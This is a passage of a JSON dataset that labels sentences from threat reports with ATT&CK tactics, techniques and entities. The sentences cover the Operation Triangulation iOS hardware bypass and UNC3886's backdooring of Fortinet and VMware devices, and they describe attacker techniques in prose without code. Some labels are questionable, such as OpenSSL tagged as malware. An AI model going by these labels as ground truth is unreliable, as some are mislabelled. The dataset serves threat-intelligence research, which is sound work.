"aptnotes-12_aptnotes_report-p16-s108-628674", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 108, "context_before": "Because no one was using these registers anymore and I knew how to use them, I took advantage of them.", "sentence_text": "It did not need to know any secret hash algorithm.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p16-s109-3fe673", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 109, "context_before": "It did not need to know any secret hash algorithm.", "sentence_text": "Could something similar have happened in this case?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p16-s110-2a23cb", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 110, "context_before": "Could something similar have happened in this case?", "sentence_text": "I do not know that, but this GPU coprocessor first appeared in the recent Apple SoCs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p16-s111-a634d6", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 111, "context_before": "I do not know that, but this GPU coprocessor first appeared in the recent Apple SoCs.", "sentence_text": "Nevertheless, there is a possibility that it was previously revealed by mistake in some particular firmware or XNU source code release and then removed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p16-s112-1df286", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 112, "context_before": "Nevertheless, there is a possibility that it was previously revealed by mistake in some particular firmware or XNU source code release and then removed.", "sentence_text": "I was hoping to find out what was located inside the second unknown region from the fix for this vulnerability implemented in iOS 16.6.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p16-s113-41abbf", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 113, "context_before": "I was hoping to find out what was located inside the second unknown region from the fix for this vulnerability implemented in iOS 16.6.", "sentence_text": "I was able to find out how Apple mitigated this issue, but they obfuscated the fix.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p16-s114-76beb7", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 114, "context_before": "I was able to find out how Apple mitigated this issue, but they obfuscated the fix.", "sentence_text": "Apple mitigated this vulnerability by adding the MMIO ranges 0x206000000–0x206050000 and 0x206110000–0x206400000 used by the exploit to the pmap-io-ranges stored in the device tree.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p16-s115-442e0a", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 115, "context_before": "Apple mitigated this vulnerability by adding the MMIO ranges 0x206000000–0x206050000 and 0x206110000–0x206400000 used by the exploit to the pmap-io-ranges stored in the device tree.", "sentence_text": "XNU uses the information stored there to determine whether to allow mapping of certain physical addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p16-s116-e470ed", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 16, "sentence_id": 116, "context_before": "XNU uses the information stored there to determine whether to allow mapping of certain physical addresses.", "sentence_text": "All entries stored there have a meaningful tag name that explains what kind of memory the range belongs to.\n16/18", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p17-s117-bc9c6d", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 17, "sentence_id": 117, "context_before": "All entries stored there have a meaningful tag name that explains what kind of memory the range belongs to.\n16/18", "sentence_text": "And here are the tag names for regions used by the exploit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p17-s118-b91cd7", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 17, "sentence_id": 118, "context_before": "And here are the tag names for regions used by the exploit.", "sentence_text": "They stand out from the rest.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p17-s119-6bda44", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 17, "sentence_id": 119, "context_before": "They stand out from the rest.", "sentence_text": "Entries for regions used by the exploit Conclusion This is no ordinary vulnerability, and we have many unanswered questions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p17-s120-a1d3d1", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 17, "sentence_id": 120, "context_before": "Entries for regions used by the exploit Conclusion This is no ordinary vulnerability, and we have many unanswered questions.", "sentence_text": "We do not know how the attackers learned to use this unknown hardware feature or what its original purpose was.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p17-s121-e813d5", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 17, "sentence_id": 121, "context_before": "We do not know how the attackers learned to use this unknown hardware feature or what its original purpose was.", "sentence_text": "Neither do we know if it was developed by Apple or it’s a third-party component like ARM CoreSight.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p17-s122-c5c575", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 17, "sentence_id": 122, "context_before": "Neither do we know if it was developed by Apple or it’s a third-party component like ARM CoreSight.", "sentence_text": "What we do know—and what this vulnerability demonstrates—is that advanced hardware-", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p17-s123-6f3380", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 17, "sentence_id": 123, "context_before": "What we do know—and what this vulnerability demonstrates—is that advanced hardware-", "sentence_text": "based protections are useless in the face of a sophisticated attacker as long as there are hardware features that can bypass those protections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p17-s124-4477b4", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 17, "sentence_id": 124, "context_before": "based protections are useless in the face of a sophisticated attacker as long as there are hardware features that can bypass those protections.", "sentence_text": "Systems that rely on “security through obscurity” can never be truly secure.\n17/18", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p18-s125-fc4649", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 18, "sentence_id": 125, "context_before": "Systems that rely on “security through obscurity” can never be truly secure.\n17/18", "sentence_text": "Update 2024-01-09\nFamous hardware hacker Hector Martin (marcan) was able to figure out that what we thought was a custom hash was actually something a little different.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p18-s126-53fe5c", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 18, "sentence_id": 126, "context_before": "Update 2024-01-09\nFamous hardware hacker Hector Martin (marcan) was able to figure out that what we thought was a custom hash was actually something a little different.", "sentence_text": "This discovery helps us understand the original purpose of this unknown hardware feature.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p18-s127-415046", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 18, "sentence_id": 127, "context_before": "This discovery helps us understand the original purpose of this unknown hardware feature.", "sentence_text": "We originally thought it was a debugging feature that provided direct memory access to the memory and was protected with a “dummy” hash for extra security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p18-s128-d4445c", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 18, "sentence_id": 128, "context_before": "We originally thought it was a debugging feature that provided direct memory access to the memory and was protected with a “dummy” hash for extra security.", "sentence_text": "This discovery also raises the possibility that this unused hardware feature could have been found through experimentation, but to do so would require attackers to solve a large number of unknown variables.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p18-s129-be7e95", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 18, "sentence_id": 129, "context_before": "This discovery also raises the possibility that this unused hardware feature could have been found through experimentation, but to do so would require attackers to solve a large number of unknown variables.", "sentence_text": "It still remains a mystery.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p18-s130-620be4", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 18, "sentence_id": 130, "context_before": "It still remains a mystery.", "sentence_text": "Operation Triangulation: The last (hardware) mystery Your email address will not be published.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-12_aptnotes_report-p18-s131-7191d4", "source": "aptnotes", "doc_id": "12_aptnotes_report", "page_number": 18, "sentence_id": 131, "context_before": "Operation Triangulation: The last (hardware) mystery Your email address will not be published.", "sentence_text": "Required fields are marked * 18/18", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p1-s1-241818", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "We often observe cyber espionage operators exploiting zero-day vulnerabilities and deploying custom malware to Internet-exposed systems as an initial attack vector.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit zero-day vulnerabilities and deploy malware to Internet-exposed systems for initial access.", "entities": [ { "text": "cyber espionage operators", "start": 17, "end": 42, "label": "ThreatActor" }, { "text": "exploiting zero-day vulnerabilities", "start": 43, "end": 78, "label": "Action" }, { "text": "deploying custom malware to Internet-exposed systems", "start": 83, "end": 135, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s2-5d3df5", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "We often observe cyber espionage operators exploiting zero-day vulnerabilities and deploying custom malware to Internet-exposed systems as an initial attack vector.", "sentence_text": "In this blog post, we describe scenarios where a suspected China-nexus threat actor likely already had access to victim environments, and then deployed backdoors onto Fortinet and VMware solutions as a means of maintaining persistent access to the environments.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Deploy backdoors on Fortinet and VMware systems to maintain persistent access.", "entities": [ { "text": "a suspected China-nexus threat actor", "start": 47, "end": 83, "label": "ThreatActor" }, { "text": "deployed backdoors onto Fortinet and VMware solutions", "start": 143, "end": 196, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s3-bfb6b1", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "In this blog post, we describe scenarios where a suspected China-nexus threat actor likely already had access to victim environments, and then deployed backdoors onto Fortinet and VMware solutions as a means of maintaining persistent access to the environments.", "sentence_text": "This involved the use of a local zero-day vulnerability in FortiOS (CVE-2022-41328) and deployment of multiple custom malware families on Fortinet and VMware systems.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1210", "name": "Exploitation of Remote Services" }, { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Exploit FortiOS zero-day vulnerability and deploy custom malware on Fortinet and VMware systems.", "entities": [ { "text": "use of a local zero-day vulnerability in FortiOS (CVE-2022-41328)", "start": 18, "end": 83, "label": "Action" }, { "text": "deployment of multiple custom malware families on Fortinet and VMware systems", "start": 88, "end": 165, "label": "Action" }, { "text": "CVE-2022-41328", "start": 68, "end": 82, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s4-0cc090", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "This involved the use of a local zero-day vulnerability in FortiOS (CVE-2022-41328) and deployment of multiple custom malware families on Fortinet and VMware systems.", "sentence_text": "In mid-2022, Mandiant, in collaboration with Fortinet, investigated the exploitation and deployment of malware across multiple Fortinet solutions including FortiGate (firewall), FortiManager (centralized management solution), and FortiAnalyzer (log management, analytics, and reporting platform).", "relevant": "yes", "tactic": [ { "name": "Execution", "id": "TA0002" }, { "name": "Initial Access", "id": "TA0001" } ], "techniques": [ { "name": "Exploitation for Client Execution", "id": "T1203" } ], "procedure": "Attackers exploit vulnerabilities and deploy malware across Fortinet systems.", "entities": [ { "text": "exploitation", "start": 72, "end": 84, "label": "Action" }, { "text": "deployment of malware", "start": 89, "end": 110, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s5-f6bc34", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "In mid-2022, Mandiant, in collaboration with Fortinet, investigated the exploitation and deployment of malware across multiple Fortinet solutions including FortiGate (firewall), FortiManager (centralized management solution), and FortiAnalyzer (log management, analytics, and reporting platform).", "sentence_text": "The following steps generally describe the actions the threat actor took:\n1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p1-s6-22c0e7", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "The following steps generally describe the actions the threat actor took:\n1.", "sentence_text": "Utilized a local directory traversal zero-day (CVE-2022-41328) exploit to write files to FortiGate firewall disks outside of the normal bounds allowed with shell access.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1210", "name": "Exploitation of Remote Services" } ], "procedure": "Exploit directory traversal vulnerability to write files outside allowed locations.", "entities": [ { "text": "Utilized a local directory traversal zero-day (CVE-2022-41328) exploit to write files", "start": 0, "end": 85, "label": "Action" }, { "text": "CVE-2022-41328", "start": 47, "end": 61, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s7-ca8fd2", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "Utilized a local directory traversal zero-day (CVE-2022-41328) exploit to write files to FortiGate firewall disks outside of the normal bounds allowed with shell access.", "sentence_text": "2. Maintained persistent access with Super Administrator privileges within FortiGate Firewalls through ICMP port knocking 3.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1205.001", "name": "Traffic Signaling: Port Knocking" } ], "procedure": "Maintain persistent access to FortiGate firewalls using ICMP port knocking with elevated privileges.", "entities": [ { "text": "Maintained persistent access with Super Administrator privileges within FortiGate Firewalls through ICMP port knocking", "start": 3, "end": 121, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s8-dded99", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "2. Maintained persistent access with Super Administrator privileges within FortiGate Firewalls through ICMP port knocking 3.", "sentence_text": "Circumvented firewall rules active on FortiManager devices with a passive traffic redirection utility, enabling continued connections to persistent backdoors with Super Administrator privileges 4.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" }, { "id": "T1090", "name": "Proxy" } ], "procedure": "Circumvent firewall rules using a traffic redirection utility to maintain connections to persistent backdoors.", "entities": [ { "text": "Circumvented firewall rules active on FortiManager devices with a passive traffic redirection utility", "start": 0, "end": 101, "label": "Action" }, { "text": "enabling continued connections to persistent backdoors with Super Administrator privileges", "start": 103, "end": 193, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s9-4543f5", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "Circumvented firewall rules active on FortiManager devices with a passive traffic redirection utility, enabling continued connections to persistent backdoors with Super Administrator privileges 4.", "sentence_text": "Established persistence on FortiManager and FortiAnalyzer devices through a custom API endpoint created within the device 5.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Establish persistence on FortiManager and FortiAnalyzer devices via a custom API endpoint.", "entities": [ { "text": "Established persistence on FortiManager and FortiAnalyzer devices through a custom API endpoint created within the device", "start": 0, "end": 121, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s10-e3505a", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "Established persistence on FortiManager and FortiAnalyzer devices through a custom API endpoint created within the device 5.", "sentence_text": "Disabled OpenSSL 1.1.0 digital signature verification of system files through targeted corruption of boot files hypervisor malware framework disclosed in September 2022.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Disable OpenSSL digital signature verification by corrupting boot files.", "entities": [ { "text": "Disabled OpenSSL 1.1.0 digital signature verification of system files through targeted corruption of boot files", "start": 0, "end": 111, "label": "Action" }, { "text": "OpenSSL 1.1.0", "start": 9, "end": 22, "label": "MalwareTool" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s11-67290b", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 11, "context_before": "Disabled OpenSSL 1.1.0 digital signature verification of system files through targeted corruption of boot files hypervisor malware framework disclosed in September 2022.", "sentence_text": "At the time of the ESXi hypervisor compromises, Mandiant observed UNC3886 directly connect from FortiGate and FortiManager devices to VIRTUALPITA backdoors on multiple occasions.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Connect from FortiGate and FortiManager devices to VIRTUALPITA backdoors.", "entities": [ { "text": "UNC3886", "start": 66, "end": 73, "label": "ThreatActor" }, { "text": "directly connect from FortiGate and FortiManager devices to VIRTUALPITA backdoors", "start": 74, "end": 155, "label": "Action" }, { "text": "VIRTUALPITA backdoors", "start": 134, "end": 155, "label": "MalwareTool" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s12-813198", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 12, "context_before": "At the time of the ESXi hypervisor compromises, Mandiant observed UNC3886 directly connect from FortiGate and FortiManager devices to VIRTUALPITA backdoors on multiple occasions.", "sentence_text": "Fortinet management IP addresses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p1-s13-c8949d", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 13, "context_before": "Fortinet management IP addresses.", "sentence_text": "Additionally, the FortiGate devices with Federal Information Processing Standards (FIPS)\ncompliance mode enabled failed to boot after it was later rebooted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p1-s14-44430b", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 14, "context_before": "Additionally, the FortiGate devices with Federal Information Processing Standards (FIPS)\ncompliance mode enabled failed to boot after it was later rebooted.", "sentence_text": "When FIPS mode is enabled, a checksum of the operating system is compared with the checksum of a clean image.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p1-s15-4fd26d", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 15, "context_before": "When FIPS mode is enabled, a checksum of the operating system is compared with the checksum of a clean image.", "sentence_text": "With assistance from Fortinet, Mandiant acquired a forensic image of these failing devices, prompting the discovery of the ICMP port knocking backdoor CASTLETAP.", "relevant": "yes", "tactic": [ { "name": "Persistence", "id": "TA0003" } ], "techniques": null, "procedure": "A backdoor is identified on compromised devices.", "entities": [ { "text": "discovery of the ICMP port knocking backdoor", "start": 106, "end": 150, "label": "Action" }, { "text": "CASTLETAP", "start": 151, "end": 160, "label": "MalwareTool" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s16-640607", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 16, "context_before": "With assistance from Fortinet, Mandiant acquired a forensic image of these failing devices, prompting the discovery of the ICMP port knocking backdoor CASTLETAP.", "sentence_text": "Fortinet Ecosystem\nMultiple components of the Fortinet ecosystem were targeted by UNC3886 before they moved laterally to VMWare infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Move laterally from Fortinet ecosystem components to VMware infrastructure.", "entities": [ { "text": "UNC3886", "start": 82, "end": 89, "label": "ThreatActor" }, { "text": "moved laterally to VMWare infrastructure", "start": 102, "end": 142, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p1-s17-19d62a", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 1, "sentence_id": 17, "context_before": "Fortinet Ecosystem\nMultiple components of the Fortinet ecosystem were targeted by UNC3886 before they moved laterally to VMWare infrastructure.", "sentence_text": "Scenario #1 (Summary): FortiManager Exposed to the Internet first occurred when the threat actor initially gained access to the Fortinet ecosystem while the FortiManager device was exposed to the internet.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Initially gained access when FortiManager device was exposed to the Internet.", "entities": [ { "text": "threat actor", "start": 84, "end": 96, "label": "ThreatActor" }, { "text": "FortiManager device", "start": 157, "end": 176, "label": "Infrastructure_Indicator" }, { "text": "gained access to", "start": 107, "end": 123, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p2-s19-d9c0ad", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "1/21", "sentence_text": "During this attack lifecycle, as seen in Figure 1, backdoors disguised as legitimate API calls (THINCRUST) were deployed across both FortiAnalyzer and FortiManager devices.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Deploy THINCRUST backdoors disguised as legitimate API calls across FortiAnalyzer and FortiManager devices.", "entities": [ { "text": "backdoors disguised as legitimate API calls (THINCRUST) were deployed across both FortiAnalyzer and FortiManager devices", "start": 51, "end": 171, "label": "Action" }, { "text": "THINCRUST", "start": 96, "end": 105, "label": "MalwareTool" } ] }, { "uid": "aptnotes-13_aptnotes_report-p2-s20-37a67f", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 2, "sentence_id": 20, "context_before": "During this attack lifecycle, as seen in Figure 1, backdoors disguised as legitimate API calls (THINCRUST) were deployed across both FortiAnalyzer and FortiManager devices.", "sentence_text": "Once persistence was established across the two devices, FortiManager scripts were used to deploy backdoors (CASTLETAP) across the FortiGate devices.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Use FortiManager scripts to deploy CASTLETAP backdoors across FortiGate devices after establishing persistence.", "entities": [ { "text": "FortiManager scripts were used to deploy backdoors (CASTLETAP) across the FortiGate devices", "start": 57, "end": 148, "label": "Action" }, { "text": "CASTLETAP", "start": 109, "end": 118, "label": "MalwareTool" } ] }, { "uid": "aptnotes-13_aptnotes_report-p2-s21-e1e796", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 2, "sentence_id": 21, "context_before": "Once persistence was established across the two devices, FortiManager scripts were used to deploy backdoors (CASTLETAP) across the FortiGate devices.", "sentence_text": "Installation Bundles which contained VIRTUALPITA and VIRTUALPIE backdoors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p2-s22-af1bb0", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 2, "sentence_id": 22, "context_before": "Installation Bundles which contained VIRTUALPITA and VIRTUALPIE backdoors.", "sentence_text": "This enabled the threat actor persistent access to the hypervisors, and allowed the attacker to execute commands on guest virtual machines.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Maintain persistent access to hypervisors and execute commands on guest virtual machines.", "entities": [ { "text": "the threat actor", "start": 13, "end": 29, "label": "ThreatActor" }, { "text": "persistent access to the hypervisors", "start": 30, "end": 66, "label": "Action" }, { "text": "allowed the attacker to execute commands on guest virtual machines", "start": 72, "end": 138, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p4-s23-39646e", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 4, "sentence_id": 23, "context_before": "This enabled the threat actor persistent access to the hypervisors, and allowed the attacker to execute commands on guest virtual machines.", "sentence_text": "The second attack lifecycle occurred where the FortiManager devices had network Access Control Lists (ACL) put in place to restrict external access to only TCP port 541 (FortiGate to FortiManager Protocol).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p4-s24-e6bbbd", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 4, "sentence_id": 24, "context_before": "The second attack lifecycle occurred where the FortiManager devices had network Access Control Lists (ACL) put in place to restrict external access to only TCP port 541 (FortiGate to FortiManager Protocol).", "sentence_text": "During this attack lifecycle, as seen in Figure 2, the threat actor deployed a network traffic redirection utility (TABLEFLIP) and reverse shell backdoor (REPTILE) on the FortiManager device to circumvent the new ACLs.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" }, { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Deploy TABLEFLIP redirection utility and REPTILE reverse shell backdoor on FortiManager to bypass ACL restrictions.", "entities": [ { "text": "the threat actor", "start": 51, "end": 67, "label": "ThreatActor" }, { "text": "deployed a network traffic redirection utility (TABLEFLIP) and reverse shell backdoor (REPTILE) on the FortiManager device to circumvent the new ACLs", "start": 68, "end": 217, "label": "Action" }, { "text": "TABLEFLIP", "start": 116, "end": 125, "label": "MalwareTool" }, { "text": "REPTILE", "start": 155, "end": 162, "label": "MalwareTool" } ] }, { "uid": "aptnotes-13_aptnotes_report-p4-s25-d2e838", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 4, "sentence_id": 25, "context_before": "During this attack lifecycle, as seen in Figure 2, the threat actor deployed a network traffic redirection utility (TABLEFLIP) and reverse shell backdoor (REPTILE) on the FortiManager device to circumvent the new ACLs.", "sentence_text": "With the redirection rules established by the TABLEFLIP utility, the threat actor was able to access the REPTILE backdoor directly from the Internet for continued access to the environment.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Access REPTILE backdoor from the Internet using redirection rules.", "entities": [ { "text": "the threat actor", "start": 65, "end": 81, "label": "ThreatActor" }, { "text": "access the REPTILE backdoor directly from the Internet for continued access to the environment", "start": 94, "end": 188, "label": "Action" }, { "text": "REPTILE backdoor", "start": 105, "end": 121, "label": "MalwareTool" } ] }, { "uid": "aptnotes-13_aptnotes_report-p4-s26-e34966", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 4, "sentence_id": 26, "context_before": "With the redirection rules established by the TABLEFLIP utility, the threat actor was able to access the REPTILE backdoor directly from the Internet for continued access to the environment.", "sentence_text": "Scenario #1 (Detailed): FortiManager Exposed to the Internet The technical details that follow describe the attack path taken by the threat actor when the FortiManager was initially exposed to the Internet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p4-s27-7d676c", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 4, "sentence_id": 27, "context_before": "Scenario #1 (Detailed): FortiManager Exposed to the Internet The technical details that follow describe the attack path taken by the threat actor when the FortiManager was initially exposed to the Internet.", "sentence_text": "THINCRUST Backdoor (Python-based Backdoor)\nlegitimate web framework file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p4-s28-b734ea", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 4, "sentence_id": 28, "context_before": "THINCRUST Backdoor (Python-based Backdoor)\nlegitimate web framework file.", "sentence_text": "The threat actor modified the legitimate file /usr/local/lib/python3.8/proj/util/urls.py to include an additional malicious API call, show_device_info , which can be seen in Figure 3.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "Modify a legitimate file to include a malicious API call.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "modified the legitimate file /usr/local/lib/python3.8/proj/util/urls.py to include an additional malicious API call, show_device_info", "start": 17, "end": 150, "label": "Action" }, { "text": "/usr/local/lib/python3.8/proj/util/urls.py", "start": 46, "end": 88, "label": "Infrastructure_Indicator" }, { "text": "show_device_info", "start": 134, "end": 150, "label": "Infrastructure_Indicator" } ] }, 